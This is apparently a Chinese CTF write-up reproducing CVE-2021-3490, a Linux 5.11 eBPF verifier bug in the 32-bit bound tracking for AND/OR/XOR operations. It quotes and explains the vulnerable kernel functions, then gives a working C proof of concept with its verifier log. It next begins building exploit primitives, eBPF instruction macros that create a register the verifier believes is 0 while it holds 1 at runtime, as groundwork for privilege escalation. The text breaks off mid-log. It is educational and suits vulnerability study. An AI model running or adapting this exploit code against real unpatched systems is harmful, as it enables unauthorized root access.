0%

ebpf pwn+CVE-2021-3490

ebpf-pwn-A-Love-Story 复现

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.3
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
# Boot the challenge kernel (bzImage + rootfs.cpio) under QEMU on a serial console.
# SMEP/SMAP are enabled through -cpu; kaslr and pti=on are passed on the kernel command line.
# oops=panic panic=1 together with -no-reboot make the VM exit on any kernel oops.
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh
# Guest init script: mount pseudo filesystems, set up devices and loopback,
# create the flag, then hand the console to a shell.

# Pseudo filesystems and device nodes
mount -t proc proc /proc
mount -t tmpfs none /tmp
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# Turn on kptr_restrict and dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
# Loopback interface
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
# Flag file (world readable and writable as configured here)
echo "flag{yhellow}" > /flag
chmod 666 /flag

# Interactive shell on the console; note it is started with uid/gid 0
# (NOTE(review): a challenge setup would normally drop to an unprivileged uid here - confirm)
setsid /bin/cttyhack setuidgid 0 /bin/sh
echo 'sh end!\n'
#poweroff -d 1800000 -f &
# Clean up and power off once the shell exits
umount /proc
umount /sys

poweroff -f

下载 5.11.16 的内核源码:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目没有内核模块,漏洞点为 CVE-2021-3490:

  • CVE-2021-3490 是一个发生在 eBPF verifier 中的漏洞,由于 eBPF verifier 在校验位运算操作( 与、或、异或 )时没有正确地更新寄存器的 32 位边界,从而导致攻击者可以构造出非法的运行时寄存器值以进行提权

在 eBPF 对寄存器计算的指令中,分为64位和32位操作两部分

  • 64位指令会对寄存器的64位全部进行操作
  • 32位指令只会对寄存器的低32位进行操作

eBPF 程序的安全主要是由 verifier 保证的,verifier 会模拟执行每一条指令并验证寄存器的值是否合法,主要关注这几个字段:

  • smin_value / smax_value:64 位有符号的值的可能取值边界
  • umin_value / umax_value:64 位无符号的值的可能取值边界
  • s32_min_value / s32_max_value:32 位有符号的值的可能取值边界
  • u32_min_value / u32_max_value:32 位无符号的值的可能取值边界

其中,这个寄存器中具体的值,会用如下结构体进行表示:

1
2
3
4
/*
 * Tracked number: bit-level knowledge the verifier has about a register.
 * In the article's examples a set bit in mask means "this bit is unknown",
 * and value carries the bits that are known
 * (e.g. value=0x1, mask=0xffffffff00000000: low 32 bits known to be 1).
 */
struct tnum {
u64 value; /* known bits */
u64 mask; /* bits whose value is not known */
};
  • value 记录已经确定的比特位的取值,mask 中为 1 的比特位表示该位的值不确定(mask 为 0 时整个寄存器的值完全已知)

用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链(模拟通过后才能正常加载)

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

首先分析调整标量数据范围的 adjust_scalar_min_max_vals 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
 * Excerpt (elided with "......") of the verifier routine that recomputes the
 * bounds of a scalar destination register after an ALU instruction.
 * For AND/OR/XOR it first combines the tnums, then updates the 32-bit bounds,
 * then the 64-bit bounds, and finally re-derives bounds and var_off.
 */
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{

......

switch (opcode) {

......

case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg); /* 32-bit bounds (the vulnerable function) */
scalar_min_max_and(dst_reg, &src_reg); /* 64-bit bounds */
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg);
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg);
scalar_min_max_xor(dst_reg, &src_reg);
break;

......

default:
mark_reg_unknown(env, regs, insn->dst_reg);
break;
}

if (alu32)
zext_32_to_64(dst_reg);

__update_reg_bounds(dst_reg); /* tighten the bounds using var_off */
__reg_deduce_bounds(dst_reg); /* cross-deduce the bounds from one another */
__reg_bound_offset(dst_reg); /* recompute var_off from the resulting bounds */
return 0;
}

cve 的漏洞点位于函数 scalar32_min_max_and,其中的 BPF_AND \ BPF_OR \ BPF_XOR 三类操作有问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/*
 * Update dst_reg's 32-bit bounds for "dst &= src" (vulnerable version quoted
 * from the kernel analysed in this article). dst_reg->var_off has already been
 * replaced by the tnum_and() result when this runs.
 */
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* Whether the low 32 bits of src_reg / dst_reg are fully known */
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
/* Low 32 bits of dst_reg->var_off, plus src_reg's s32_min_value and u32_max_value */
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;

/*
 * Both low halves known: return without touching the 32-bit bounds, on the
 * assumption that the 64-bit pass will set them. That assumption fails when
 * the upper 32 bits are unknown - this early return is the CVE-2021-3490 flaw.
 */
if (src_known && dst_known)
return;

/* Minimum comes from the known bits of var32_off; maximum is the smaller of the operands' maxima */
dst_reg->u32_min_value = var32_off.value;
dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
/* Either operand may be negative: drop the signed bounds entirely */
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* Both non-negative: the signed bounds mirror the unsigned ones */
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
}
  • 在更新 32 位边界值时,如果两个寄存器的低 32 位都为 known 那就可以直接跳过,因为程序认为 64 位时还会进行更新
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
 * Update dst_reg's 64-bit bounds for "dst &= src". Unlike the 32-bit variant,
 * "known" here means all 64 bits are known; only then is the register marked
 * as a constant (which also sets the 32-bit bounds).
 */
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* Whether the full 64-bit value of src_reg / dst_reg is known */
bool src_known = tnum_is_const(src_reg->var_off);
bool dst_known = tnum_is_const(dst_reg->var_off);
/* src_reg's signed minimum and unsigned maximum */
s64 smin_val = src_reg->smin_value;
u64 umax_val = src_reg->umax_value;

/* Both operands fully known: the result is a constant, set every bound from it */
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}

/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
*/
dst_reg->umin_value = dst_reg->var_off.value;
dst_reg->umax_value = min(dst_reg->umax_value, umax_val);
if (dst_reg->smin_value < 0 || smin_val < 0) {
/* Lose signed bounds when ANDing negative numbers,
* ain't nobody got time for that.
*/
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
/* ANDing two positives gives a positive, so safe to
* cast result into s64.
*/
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg); /* tighten the bounds using var_off */
}
  • 在更新64位边界值时,若两个寄存器都为 known 就直接调用 __mark_reg_known(PS:64位和32位判断调用 __mark_reg_known 的条件不同,这也引发了漏洞)
  • __mark_reg_known 用于设置一个已经确定的寄存器,简单地调用 tnum_const 将寄存器的 var_off 设置为 known,并给对应边界赋值
1
2
3
4
5
6
7
/*
 * Mark reg as holding the known constant imm: zero the fields that lie between
 * 'type' and 'var_off' in struct bpf_reg_state, then set var_off and all
 * bounds through ___mark_reg_known().
 */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
/* Clear id, off, and union(map_ptr, range) */
memset(((u8 *)reg) + sizeof(reg->type), 0,
offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
___mark_reg_known(reg, imm);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * Set var_off to the constant imm and collapse every bound to that value:
 * the 64-bit signed/unsigned bounds to imm, the 32-bit ones to its low 32 bits.
 */
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const(imm);
reg->smin_value = (s64)imm;
reg->smax_value = (s64)imm;
reg->umin_value = imm;
reg->umax_value = imm;

/* 32-bit bounds use the truncated value */
reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}

在最后还会调用 __update_reg_bounds() 对比寄存器的 var_off 并更新边界值:

1
2
3
4
5
/* Tighten the 32-bit bounds and then the 64-bit bounds of reg using its var_off. */
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Tighten the 32-bit bounds with the low half of var_off. Each minimum becomes
 * the larger of the current minimum and the smallest value var_off allows;
 * each maximum becomes the smaller of the current maximum and the largest
 * value var_off allows. Bounds are only ever narrowed here, so an inconsistent
 * pair such as min=1 with var_off forcing max=0 is not repaired.
 */
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);

/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX));
/* unsigned min: all unknown bits clear; unsigned max: all unknown bits set */
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask));
}
1
2
3
4
5
6
7
8
9
10
11
12
/*
 * 64-bit counterpart of __update_reg32_bounds(): narrow smin/smax/umin/umax
 * to what the full var_off permits.
 */
static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
/* unsigned min: all unknown bits clear; unsigned max: all unknown bits set */
reg->umin_value = max(reg->umin_value, reg->var_off.value);
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}
  • 计算方法如下:
    • 最小边界值 = [min_value , var_off.value | (var_off.mask & MIN) ] 中的最大者
    • 最大边界值 = [max_value , var_off.value | (var_off.mask & MAX) ] 中的最小者

但这样存在一个问题,若存在一个高32位 unknown 低32位 known 的寄存器:

  • 在理论上,程序执行时 scalar32_min_max_and 就能确定该寄存器的值,应该调用 __mark_reg_known 进行更新
  • 但程序认为在 scalar_min_max_and 中也能检查寄存器是否 known,因此选择在 scalar_min_max_and 中调用 __mark_reg_known,而 scalar32_min_max_and 中直接返回
  • 核心问题就是,函数 scalar32_min_max_and 与 scalar_min_max_and 中判断寄存器是否 known 的条件不同(前者只看低 32 位,后者要求 64 位全部已知),导致原本应该执行 __mark_reg_known 的程序没有执行

如果有以下两个寄存器:

  • R2 = { .value = 0x1, .mask = 0xffffffff00000000 }:该寄存器低 32 位值已知为 0x1,高 32 位不确定
  • R3 = { .value = 0x100000002, .mask = 0x0 }:该寄存器 64 位值全部已知,为 0x100000002

假如我们将 R2 与 R3 做与运算,其结果为 { .value = 0, .mask = 0x100000000 },详细调用过程如下:

  • 首先执行 adjust_scalar_min_max_vals 函数,随后会进入 tnum_and 函数
    • 该函数返回 R2.var_off = {mask = 0x100000000; value=0x0}
    • 由于 R2 的高32位是不确定,导致 0x100000002 中高出32位的非“0”部分不确定,所以最终 R2.var_off.mask = 0x100000000(仅有第32位不确定)
  • 然后执行 scalar32_min_max_and 检查寄存器32位的值的范围
    • 这里由于 R2 和 R3 两个寄存器的低32位的值都是确定的,该函数直接返回
  • 接着执行 scalar_min_max_and 检查寄存器64位的值的范围
    • 由于 R2 寄存器第32位仍不确定,因此不会调用 __mark_reg_known
  • 在末尾调用 __update_reg_bounds,这个函数会对 R2 的值做相应修改:
    • 设置 R2.u32_max_value=0x0(取 min(R2.u32_max_value=1, (u32)(var_off.value | var_off.mask)=0),结果为 0)
    • 保持 R2.u32_min_value=0x1(取 max(R2.u32_min_value=1, (u32)var_off.value=0),结果仍为 1)
  • 最后执行 __reg_bound_offset 函数,也不会改变 R2 的属性

因此经过该轮计算之后 R2 的最小值为 1,最大值为 0,而这显然是不合理的

测试样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <ctype.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

/*
 * POC_PROG(__map_fd) - comma-separated eBPF instruction list that triggers
 * CVE-2021-3490. It expands to initializers for a struct bpf_insn array and
 * has no trailing comma or exit instruction; the caller appends those.
 *
 * Steps: look up element 0 of the array map, load its first 8 bytes into r2,
 * keep only the (unknown) upper 32 bits and add 1 so the low 32 bits are the
 * known constant 1, build r3 = 0x100000002, then AND r2 with r3.
 *
 * Every comment sits BEFORE the line-continuation backslash: a backslash only
 * splices lines when it is the last character on the line, so a trailing
 * comment after it would end the macro early.
 */
#define POC_PROG(__map_fd) \
    /* Load value from map */ \
    BPF_LD_MAP_FD(BPF_REG_9, __map_fd),             /* r9 = map (from fd) */ \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),            /* r1 = r9 */ \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),           /* r2 = r10 (frame pointer) */ \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),          /* r2 += -8 */ \
    BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0),            /* *(r2 + 0) = 0 (key) */ \
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
    /* if success, r0 will be ptr to value, 0 for failed */ \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),          /* if r0 != 0x0 goto pc+1 */ \
    BPF_EXIT_INSN(),                                /* lookup failed: exit */ \
    /* load value into r2, make it part-unknown */ \
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0),   /* r2 = *(r0 + 0) */ \
    BPF_MOV64_IMM(BPF_REG_4, 0xffffffff),           /* r4 = -1 */ \
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32),          /* r4 <<= 32 */ \
    BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_4),   /* r2 &= r4 */ \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x1),         /* r2 += 1 */ \
    /* r3 = 0x100000002 */ \
    BPF_MOV64_IMM(BPF_REG_3, 0x1),                  /* r3 = 1 */ \
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32),          /* r3 <<= 32 */ \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2),         /* r3 += 2 */ \
    /* trigger the vulnerability */ \
    BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_3)    /* r2 &= r3 */


/*
 * PoC entry point: create an array map, store a zero in element 0, then load
 * POC_PROG followed by an exit instruction so the verifier log can be
 * inspected for the inconsistent 32-bit bounds on r2.
 *
 * Returns 0; failures while creating or filling the map go through err_exit().
 */
int main(int argc , char **argv, char **envp)
{
    /* Zero-initialised so no stale stack bytes are copied into the map value */
    size_t value[0x1000] = {0};
    int key = 0;
    int map_fd;

    (void)argc;
    (void)argv;
    (void)envp;

    map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
    if (map_fd < 0) {
        err_exit("FAILED to create eBPF map!");
    }

    if (bpf_map_update_elem(map_fd, &key, value, 0) < 0) {
        err_exit("FAILED to load value into map!");
    }

    struct bpf_insn prog[] = {
        POC_PROG(map_fd),
        BPF_EXIT_INSN()
    };
    /*
     * The result is deliberately not checked: the sample output shown with
     * this PoC ends in a verifier complaint about R0, and the printed log is
     * what matters here. NOTE(review): confirm the meaning of the last two
     * run_bpf_prog() arguments against bpf_tools.h.
     */
    run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 2, 1);

    return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/ $ ./exp
func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (18) r9 = 0x0
2: R1=ctx(id=0,off=0,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
2: (bf) r1 = r9
4: (07) r2 += -8
2: (bf) r1 = r9
3: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
3: (bf) r2 = r10
4: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
4: (07) r2 += -8
5: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
5: (7a) *(u64 *)(r2 +0) = 0
6: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
6: (85) call bpf_map_lookup_elem#1
7: R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
7: (55) if r0 != 0x0 goto pc+1
R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: (95) exit
9: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
9: (79) r2 = *(u64 *)(r0 +0)
R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: (b7) r4 = -1
11: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-1 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
11: (67) r4 <<= 32 /* r4=0xffffffff00000000 */
12: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
12: (5f) r2 &= r4 /* 取r2的高32位 */
13: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smax_value=9223372032559808512,umax_value=18446744069414584320,var_off=(0x0; 0xffffffff00000000),s32_min_value=0,s32_max_value=0,u32_max_val
ue=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
13: (07) r2 += 1
14: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000) */
14: (b7) r3 = 1
15: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP1 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
15: (67) r3 <<= 32
16: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967296 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
16: (07) r3 += 2 /* r3=0x100000002 */
17: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967298 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000)
r3=0x100000002,var_off=(0x100000002; 0x0) */
17: (5f) r2 &= r3
18: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,umax_value=4294967296,var_off=(0x0; 0x100000000),s32_min_value=1,s32_max_value=0,u32_min_value=1,u32_max_value=0) R3_w=invP4294967298 R4_w=i
nvP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* 注意r2中{s32_min_value=1,s32_max_value=0},证明漏洞已经生效 */
18: (95) exit
R0 leaks addr as return value
processed 18 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1

入侵思路

核心思路参考:[漏洞分析] 【CVE-2021-3490】eBPF verifier 32 位边界计算错误漏洞分析与利用 (buaq.net)

利用漏洞构造一个最小边界值为 “1”、最大边界值为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#define VULN_REG    BPF_REG_6
/*
 * Instruction list that looks up element __idx of the array map behind
 * __map_fd and leaves the resulting value pointer in __dst_reg.
 * If the lookup returns 0 the program exits immediately. On success r0 is
 * reset to 0 afterwards. Uses r9, r1, r2 and the stack slot at r10-8 as scratch.
 */
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

/*
 * Instruction list that reproduces the verifier bug on VULN_REG:
 * load element 0 of the map, keep only its unknown upper 32 bits and add 1
 * (low 32 bits known to be 1), then AND with the constant 0x100000002.
 * Per the article, the verifier afterwards tracks 32-bit bounds [1, 0] for
 * VULN_REG while its low 32 bits are 0 at runtime.
 * Clobbers r3, r4, r8 and whatever BPF_READ_ARRAY_MAP_IDX uses.
 */
#define TRIGGER_VULN(__map_fd) \
/* load value into VULN_REG, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* trigger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)
  • 因为 R1~R5 有的时候要用来作为函数参数,所以这里在 R6 上构造
  • 此时 R6 32 位边界值为 [1, 0] ,32位运行时值为 0

构造运行时为 “1” 但 verifier 确信为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
/*
 * Instruction list that turns the inconsistent VULN_REG produced by
 * TRIGGER_VULN into a register the verifier believes is the constant 0 while
 * it holds 1 at runtime (as described in the article).
 * r7 is loaded from element 0 of the map; the program exits with r0 = 0 unless
 * the low 32 bits of r7 are <= 1. Then VULN_REG += r7, += 1, &= 1.
 * Clobbers r7, r8 and whatever BPF_READ_ARRAY_MAP_IDX uses.
 */
#define MAKE_VULN_REG(__map_fd)                         \
/* load value into r7, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)
  • 构造出另一个 32 位边界值为 [0, 1]、32 位运行时值为 0 的寄存器 R7
  • 把寄存器 R6 和 R7 相加,得到新的 R6,边界值为 [1, 1] ,32位运行时值为 0,于是便获得了一个运行时为 “0” 但 verifier 认为是 “1” 的寄存器
  • 如果我们再给 R6 加上 1 ,从而使得边界值为 [2, 2] ,但实际上的 32 位值为 1
  • 再将 R6 与 1 做 & 运算,从而使得边界值为 [0, 0] ,但实际上的 32 位值为 1
  • 最终 verifier 便会认为该寄存器的值变为 “0”,但其实际上的运行时值为 “1”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
36: (07) r6 += 1
37: R0_w=invP0 R6_w=invP(id=0,smin_value=-9223372036854775806,smax_value=9223372
032559808514,umin_value=2,umax_value=18446744069414584322,var_off=(0x2; 0xffffff
